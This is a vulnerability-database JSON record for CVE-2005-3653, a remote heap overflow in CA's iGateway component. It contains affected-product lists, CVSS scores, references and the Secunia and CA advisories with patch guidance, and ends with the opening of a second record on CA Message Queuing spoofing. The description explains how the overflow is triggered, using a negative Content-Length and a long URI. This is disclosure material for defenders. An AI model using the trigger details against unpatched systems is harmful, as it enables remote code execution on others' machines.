"version": "4.0.050615"
},
{
"_id": null,
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "9.01"
},
{
"_id": null,
"model": "unicenter service desk",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.0"
},
{
"_id": null,
"model": "unicenter service delivery",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.0"
},
{
"_id": null,
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.5"
},
{
"_id": null,
"model": "brightstor storage resource manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.4"
},
{
"_id": null,
"model": "etrust integrated threat management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"_id": null,
"model": "unicenter exchange management console",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "11.0"
},
{
"_id": null,
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "9.01"
},
{
"_id": null,
"model": "etrust integrated threat management",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8.0"
},
{
"_id": null,
"model": "unicenter asset portfolio management",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "11.0"
},
{
"_id": null,
"model": "etrust identity minder",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8.0"
},
{
"_id": null,
"model": "brightstor arcserve backup laptops desktops",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "11.0"
},
{
"_id": null,
"model": "associates unicenter web server management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"_id": null,
"model": "associates unicenter service matrix analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"_id": null,
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"_id": null,
"model": "associates unicenter service fulfillment",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"_id": null,
"model": "associates unicenter service fulfillment",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"_id": null,
"model": "associates unicenter service desk knowledge tools",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"_id": null,
"model": "associates unicenter service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"_id": null,
"model": "associates unicenter service delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"_id": null,
"model": "associates unicenter service catalog/fulfillment/accounting",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"_id": null,
"model": "associates unicenter mq management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"_id": null,
"model": "associates unicenter management for websphere",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"_id": null,
"model": "associates unicenter management for weblogic",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"_id": null,
"model": "associates unicenter exchange management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"_id": null,
"model": "associates unicenter ca web services distributed management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"_id": null,
"model": "associates unicenter autosys jm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"_id": null,
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"_id": null,
"model": "associates unicenter application server managment",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"_id": null,
"model": "associates unicenter application performance monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"_id": null,
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"_id": null,
"model": "associates etrust integrated threat management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"_id": null,
"model": "associates etrust identity minder",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"_id": null,
"model": "associates etrust directory",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"_id": null,
"model": "associates etrust audit irecorders",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"_id": null,
"model": "associates etrust audit irecorders sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.5"
},
{
"_id": null,
"model": "associates etrust audit irecorders sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.5"
},
{
"_id": null,
"model": "associates etrust audit aries",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"_id": null,
"model": "associates etrust audit aries sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.5"
},
{
"_id": null,
"model": "associates etrust audit aries sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.5"
},
{
"_id": null,
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"_id": null,
"model": "associates brightstor srm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"_id": null,
"model": "associates brightstor srm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"_id": null,
"model": "associates brightstor srm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.4"
},
{
"_id": null,
"model": "associates brightstor srm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.3"
},
{
"_id": null,
"model": "associates brightstor san manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"_id": null,
"model": "associates brightstor san manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"_id": null,
"model": "associates brightstor process automation manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"_id": null,
"model": "associates brightstor portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"_id": null,
"model": "associates brightstor enterprise backup for windows bit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6410.5"
},
{
"_id": null,
"model": "associates brightstor enterprise backup for tru64",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"_id": null,
"model": "associates brightstor enterprise backup for solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"_id": null,
"model": "associates brightstor enterprise backup for solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.0"
},
{
"_id": null,
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"_id": null,
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"_id": null,
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"_id": null,
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "9.01"
},
{
"_id": null,
"model": "associates arcserve backup for laptops and desktops",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"_id": null,
"model": "associates arcserve backup for laptops and desktops",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
}
],
"sources": [
{
"db": "BID",
"id": "16354"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-713"
},
{
"db": "NVD",
"id": "CVE-2005-3653"
}
]
},
"credits": {
"_id": null,
"data": "Erika Mendoza",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200512-713"
}
],
"trust": 0.6
},
"cve": "CVE-2005-3653",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2005-3653",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-14861",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2005-3653",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200512-713",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-14861",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14861"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-713"
},
{
"db": "NVD",
"id": "CVE-2005-3653"
}
]
},
"description": {
"_id": null,
"data": "Heap-based buffer overflow in the iGateway service for various Computer Associates (CA) iTechnology products, in iTechnology iGateway before 4.0.051230, allows remote attackers to execute arbitrary code via an HTTP request with a negative Content-Length field. \nThe attacker can trigger the vulnerability by supplying a negative HTTP Content-Length value and a large URI to the service. \nA successful attack can result in corrupting process memory and the execution of arbitrary code with SYSTEM privileges on Windows platforms. The vendor has reported that this issue triggers only a denial-of-service condition on other platforms. \nProducts containing iGateway 4.0.051230 are vulnerable to this issue. iTechnology is an integrated technology that provides standard Web service interfaces for third-party products. There is a heap overflow vulnerability in iTechnology\u0027s processing of HTTP request headers. iGateway service monitors standard HTTP or SSL communication on port 5250. The service does not properly handle negative HTTP Content-Length fields. iGateway parses the Content-length field value of the HTTP request and uses this value directly in the malloc() heap allocation call, so if a negative value is provided, the heap allocation call will return a small buffer. After the malloc() call, memcpy the provided URI to the allocated buffer and overwrite it to the heap. \n\nTITLE:\nCA Products iGateway Service Content-Length Buffer Overflow\n\nSECUNIA ADVISORY ID:\nSA18591\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/18591/\n\nCRITICAL:\nModerately critical\n\nIMPACT:\nSystem access\n\nWHERE:\n\u003eFrom local network\n\nSOFTWARE:\nBrightStor ARCserve Backup 11.x\nhttp://secunia.com/product/312/\nBrightStor ARCserve Backup 11.x (for Windows)\nhttp://secunia.com/product/3099/\nBrightStor ARCserve Backup 9.x\nhttp://secunia.com/product/313/\nBrightStor ARCserve Backup for Laptops \u0026 Desktops 11.x\nhttp://secunia.com/product/5906/\nBrightStor Enterprise Backup 10.x\nhttp://secunia.com/product/314/\nBrightStor Process Automation Manager 11.x\nhttp://secunia.com/product/5908/\nBrightStor Storage Resource Manager 11.x\nhttp://secunia.com/product/5909/\nBrightStor Storage Resource Manager 6.x\nhttp://secunia.com/product/5910/\nCA Advantage Data Transformer 2.x\nhttp://secunia.com/product/5904/\nCA AllFusion Harvest Change Manager 7.x\nhttp://secunia.com/product/5905/\nCA BrightStor Portal 11.x\nhttp://secunia.com/product/5577/\nCA BrightStor SAN Manager 11.x\nhttp://secunia.com/product/5576/\nCA eTrust Admin 8.x\nhttp://secunia.com/product/5584/\nCA eTrust Audit 1.x\nhttp://secunia.com/product/5911/\nCA eTrust Audit 8.x\nhttp://secunia.com/product/5912/\nCA eTrust Identity Minder 8.x\nhttp://secunia.com/product/5913/\nCA Unicenter Service Fulfillment 2.x\nhttp://secunia.com/product/5942/\neTrust Secure Content Manager (SCM)\nhttp://secunia.com/product/3391/\n\nDESCRIPTION:\nErika Mendoza has reported a vulnerability in various CA products,\nwhich can be exploited by malicious people to compromise a vulnerable\nsystem. \n\nThe vulnerability is caused due to a boundary error in the handling\nof HTTP data in the iGateway component. \n\nSOLUTION:\nUpdate the iGateway component to version 4.0.051230 or later. \nftp://ftp.ca.com/pub/iTech/downloads/\n\nPROVIDED AND/OR DISCOVERED BY:\nErika Mendoza\n\nORIGINAL ADVISORY:\nComputer Associates: \nhttp://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33778\n\niDEFENSE:\nhttp://www.idefense.com/intelligence/vulnerabilities/display.php?id=376\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \nPlease see below for important changes to CAID 33778 (aka CVE-2005-3653;\nOSVDB 22688; X-Force 24269; SecurityTracker Alert ID 1015526). \nChangelog is near end of advisory. \n\nRegards,\nKen Williams\n\n\nTitle: CAID 33778 - CA iGateway Content-Length Buffer Overflow \nVulnerability [v1.1]\n\nCA Vulnerability ID: 33778\n\nCA Advisory Date: 2006-01-23\nUpdated Advisory [v1.1]: 2006-01-26\n\nDiscovered By: Erika Mendoza reported this issue to iDefense. \n\n\nMitigating Factors: None. \n\n\nSeverity: CA has given this vulnerability a Medium risk rating. \n\n\nAffected Technologies: Please note that the iGateway component is\nnot a product, but rather a common component that is included \nwith multiple products. The iGateway component is included in \nthe following CA products, which are consequently potentially \nvulnerable. \n\n\nAffected Products:\n\nBrightStor ARCserve Backup r11.5\nBrightStor ARCserve Backup r11.1\nBrightStor ARCserve Backup for Windows r11\nBrightStor Enterprise Backup 10.5\nBrightStor ARCserve Backup v9.01\nBrightStor ARCserve Backup Laptop \u0026 Desktop r11.1\nBrightStor ARCserve Backup Laptop \u0026 Desktop r11\nBrightStor Process Automation Manager r11.1\nBrightStor SAN Manager r11.1\nBrightStor SAN Manager r11.5\nBrightStor Storage Resource Manager r11.5\nBrightStor Storage Resource Manager r11.1\nBrightStor Storage Resource Manager 6.4\nBrightStor Storage Resource Manager 6.3\nBrightStor Portal 11.1\n\nNote to BrightStor Storage Resource Manager and BrightStor Portal\nusers: In addition to the application servers where these products \nare installed, all hosts that have iSponsors deployed to them for \nmanaging applications like Veritas Volume Manager and Tivoli TSM \nare also affected by this vulnerability. \n\neTrust Products:\neTrust Audit 1.5 SP2 (iRecorders and ARIES)\neTrust Audit 1.5 SP3 (iRecorders and ARIES)\neTrust Audit 8.0 (iRecorders and ARIES)\neTrust Admin 8.1\neTrust Identity Minder 8.0\neTrust Secure Content Manager (SCM) R8\neTrust Integrated Threat Management (ITM) R8\neTrust Directory, R8.1 (Web Components Only)\n\nUnicenter Products:\nUnicenter CA Web Services Distributed Management R11\nUnicenter AutoSys JM R11\nUnicenter Management for WebLogic / Management for WebSphere R11\nUnicenter Service Delivery R11\nUnicenter Service Level Management (USLM) R11\nUnicenter Application Performance Monitor R11\nUnicenter Service Desk R11\nUnicenter Service Desk Knowledge Tools R11\nUnicenter Asset Portfolio Management R11\nUnicenter Service Metric Analysis R11\nUnicenter Service Catalog/Assure/Accounting R11\nUnicenter MQ Management R11\nUnicenter Application Server Management R11\nUnicenter Web Server Management R11\nUnicenter Exchange Management R11\n\n\nAffected platforms:\nAIX, HP-UX, Linux Intel, Solaris, and Windows\n\n\nStatus and Recommendation: \nCustomers with vulnerable versions of the iGateway component \nshould upgrade to the current version of iGateway (4.0.051230 or \nlater), which is available for download from the following \nlocations:\nhttp://supportconnect.ca.com/\nftp://ftp.ca.com/pub/iTech/downloads/\n\n\nDetermining the version of iGateway:\nTo determine the version numbers of the iGateway components:\n\nGo to the igateway directory:\n\nOn windows, this is %IGW_LOC%\nDefault path for v3.*: C:\\Program Files\\CA\\igateway\nDefault path for v4.*: \nC:\\Program Files\\CA\\SharedComponents\\iTechnology\n\nOn unix, \nDefault path for v3.*: \t/opt/CA/igateway\nDefault path for v4.*: \tthe install directory path is contained in \nopt/CA/SharedComponents/iTechnology.location. \nThe default path is /opt/CA/SharedComponents/iTechnology\n\nLook at the \u003cVersion\u003e element in igateway.conf. \n\nThe versions are affected by this vulnerability if you see \na value LESS THAN the following: \n\u003cVersion\u003e4.0.051230\u003c/Version\u003e (note the format of v.s.YYMMDD)\n\n\nReferences: \n(note that URLs may wrap)\nCA SupportConnect:\nhttp://supportconnect.ca.com/\nhttp://supportconnectw.ca.com/public/ca_common_docs/igatewaysecurity_not\nice.asp\n\nCAID: 33778\nCAID Advisory link: \nhttp://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33778\n\nCVE Reference: CVE-2005-3653\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3653\n\nOSVDB Reference: OSVDB-22688\nhttp://osvdb.org/22688\n\niDefense Reference:\nComputer Associates iTechnology iGateway Service Content-Length \nBuffer Overflow\nhttp://www.idefense.com/intelligence/vulnerabilities/display.php?id=376\n\n\nChangelog:\nv1.0 - Initial Release\nv1.1 - Removed several unaffected technologies; added more \nreference links. \n\n\nCustomers who require additional information should contact CA \nTechnical Support at http://supportconnect.ca.com. \n\nFor technical questions or comments related to this advisory,\nplease send email to vuln@ca.com, or contact me directly. \n\nIf you discover a vulnerability in CA products, please report\nyour findings to vuln@ca.com, or utilize our \"Submit a \nVulnerability\" form. \nURL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx\n\n\nRegards,\nKen Williams ; 0xE2941985\nDir. of CA Vulnerability Research Team\n\n\nCA, One Computer Associates Plaza. Islandia, NY 11749\n\t\nContact http://www3.ca.com/contact/\nLegal Notice http://ca.com/calegal.htm\nPrivacy Policy http://www.ca.com/caprivacy.htm\nCopyright 2006 CA. All rights reserved",
"sources": [
{
"db": "NVD",
"id": "CVE-2005-3653"
},
{
"db": "BID",
"id": "16354"
},
{
"db": "VULHUB",
"id": "VHN-14861"
},
{
"db": "PACKETSTORM",
"id": "43303"
},
{
"db": "PACKETSTORM",
"id": "43468"
}
],
"trust": 1.44
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2005-3653",
"trust": 2.1
},
{
"db": "BID",
"id": "16354",
"trust": 2.0
},
{
"db": "OSVDB",
"id": "22688",
"trust": 1.8
},
{
"db": "SECUNIA",
"id": "18591",
"trust": 1.8
},
{
"db": "SECTRACK",
"id": "1015526",
"trust": 1.7
},
{
"db": "SREASON",
"id": "380",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2006-0311",
"trust": 1.7
},
{
"db": "CNNVD",
"id": "CNNVD-200512-713",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-14861",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "43303",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "43468",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14861"
},
{
"db": "BID",
"id": "16354"
},
{
"db": "PACKETSTORM",
"id": "43303"
},
{
"db": "PACKETSTORM",
"id": "43468"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-713"
},
{
"db": "NVD",
"id": "CVE-2005-3653"
}
]
},
"id": "VAR-200512-0273",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-14861"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-03T22:39:49.392000Z",
"patch": {
"_id": null,
"data": [
{
"title": "CA iTechnology iGateway Service negative Content-Length Repair measures for field value buffer error vulnerability",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=146825"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200512-713"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-119",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14861"
},
{
"db": "NVD",
"id": "CVE-2005-3653"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.2,
"url": "http://www.idefense.com/intelligence/vulnerabilities/display.php?id=376"
},
{
"trust": 1.9,
"url": "http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33778"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/16354"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/423403/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/423288/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/igatewaysecurity_notice.asp"
},
{
"trust": 1.7,
"url": "http://www.osvdb.org/22688"
},
{
"trust": 1.7,
"url": "http://securitytracker.com/id?1015526"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/18591"
},
{
"trust": 1.7,
"url": "http://securityreason.com/securityalert/380"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2006/0311"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/24269"
},
{
"trust": 1.6,
"url": "http://marc.info/?l=full-disclosure\u0026m=113803349715927\u0026w=2"
},
{
"trust": 0.3,
"url": "http://www.ca.com/"
},
{
"trust": 0.3,
"url": "/archive/1/423403"
},
{
"trust": 0.3,
"url": "/archive/1/423288"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=full-disclosure\u0026amp;m=113803349715927\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/314/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5912/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3099/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3391/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5913/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5576/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5577/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5911/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5906/"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5904/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5905/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/18591/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5908/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5584/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5909/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5942/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5910/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/313/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/312/"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2005-3653"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com."
},
{
"trust": 0.1,
"url": "http://ca.com/calegal.htm"
},
{
"trust": 0.1,
"url": "http://www.ca.com/caprivacy.htm"
},
{
"trust": 0.1,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/igatewaysecurity_not"
},
{
"trust": 0.1,
"url": "http://osvdb.org/22688"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/"
},
{
"trust": 0.1,
"url": "http://www3.ca.com/contact/"
},
{
"trust": 0.1,
"url": "http://www3.ca.com/securityadvisor/vulninfo/submit.aspx"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14861"
},
{
"db": "BID",
"id": "16354"
},
{
"db": "PACKETSTORM",
"id": "43303"
},
{
"db": "PACKETSTORM",
"id": "43468"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-713"
},
{
"db": "NVD",
"id": "CVE-2005-3653"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-14861",
"ident": null
},
{
"db": "BID",
"id": "16354",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "43303",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "43468",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-200512-713",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2005-3653",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2005-12-31T00:00:00",
"db": "VULHUB",
"id": "VHN-14861",
"ident": null
},
{
"date": "2006-01-23T00:00:00",
"db": "BID",
"id": "16354",
"ident": null
},
{
"date": "2006-01-25T06:44:12",
"db": "PACKETSTORM",
"id": "43303",
"ident": null
},
{
"date": "2006-01-29T22:15:05",
"db": "PACKETSTORM",
"id": "43468",
"ident": null
},
{
"date": "2005-12-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200512-713",
"ident": null
},
{
"date": "2005-12-31T05:00:00",
"db": "NVD",
"id": "CVE-2005-3653",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2018-10-19T00:00:00",
"db": "VULHUB",
"id": "VHN-14861",
"ident": null
},
{
"date": "2007-06-27T19:38:00",
"db": "BID",
"id": "16354",
"ident": null
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200512-713",
"ident": null
},
{
"date": "2025-04-03T01:03:51.193000",
"db": "NVD",
"id": "CVE-2005-3653",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200512-713"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "CA iTechnology iGateway Service negative Content-Length Field value buffer error vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200512-713"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200512-713"
}
],
"trust": 0.6
}
}
VAR-200508-0052
Vulnerability from variot - Updated: 2025-04-03 22:23Computer Associates (CA) Message Queuing (CAM / CAFT) 1.05, 1.07 before Build 220_13, and 1.11 before Build 29_13 allows remote attackers to execute arbitrary commands via spoofed CAFT packets. CAM is prone to a vulnerability that could permit the spoofing of a CAFT application utilizing the CAM instance. This may ultimately allow the execution of arbitrary commands. CAFT is a file transfer application that utilizes CAM to send and receive the files. The problem presents itself due to a failure in the CAM service to verify the legitimacy of the CAFT application.
Bist Du interessiert an einem neuen Job in IT-Sicherheit?
Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secunia_vacancies/
TITLE: CA Various Products Message Queuing Vulnerabilities
SECUNIA ADVISORY ID: SA16513
VERIFY ADVISORY: http://secunia.com/advisories/16513/
CRITICAL: Moderately critical
IMPACT: Spoofing, DoS, System access
WHERE:
From local network
SOFTWARE: CA Unicenter TNG 2.x http://secunia.com/product/3206/ CA Unicenter Software Delivery 4.x http://secunia.com/product/5597/ CA Unicenter Software Delivery 3.x http://secunia.com/product/5596/ CA Unicenter Service Level Management 3.x http://secunia.com/product/5595/ CA Unicenter Remote Control 6.x http://secunia.com/product/2622/ CA Unicenter Performance Management for OpenVMS 2.x http://secunia.com/product/5573/ CA Unicenter Network and Systems Management (NSM) Wireless Network Management Option 3.x http://secunia.com/product/5594/ CA Unicenter Network and Systems Management (NSM) 3.x http://secunia.com/product/1683/ CA Unicenter Management for WebSphere MQ 3.x http://secunia.com/product/5590/ CA Unicenter Management for Web Servers 5.x http://secunia.com/product/5593/ CA Unicenter Management for Microsoft Exchange 4.x http://secunia.com/product/5591/ CA Unicenter Management for Lotus Notes/Domino 4.x http://secunia.com/product/5592/ CA Unicenter Jasmine 3.x http://secunia.com/product/5589/ CA Unicenter Enterprise Job Manager 1.x http://secunia.com/product/5588/ CA Unicenter Data Transport Option 2.x http://secunia.com/product/5587/ CA Unicenter Asset Management 4.x http://secunia.com/product/1682/ CA Unicenter Asset Management 3.x http://secunia.com/product/5586/ CA Unicenter Application Performance Monitor 3.x http://secunia.com/product/5585/ CA eTrust Admin 8.x http://secunia.com/product/5584/ CA eTrust Admin 2.x http://secunia.com/product/5583/ CA CleverPath Predictive Analysis Server 3.x http://secunia.com/product/5581/ CA CleverPath Predictive Analysis Server 2.x http://secunia.com/product/5580/ CA CleverPath OLAP 5.x http://secunia.com/product/5578/ CA CleverPath Enterprise Content Manager (ECM) 3.x http://secunia.com/product/5579/ CA CleverPath Aion 10.x http://secunia.com/product/5582/ CA BrightStor SAN Manager 11.x http://secunia.com/product/5576/ CA BrightStor SAN Manager 1.x http://secunia.com/product/5575/ CA BrightStor Portal 11.x http://secunia.com/product/5577/ CA Advantage Data Transport 3.x http://secunia.com/product/5574/
DESCRIPTION: Some vulnerabilities have been reported in various products within the CA Message Queuing (CAM / CAFT) software, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system.
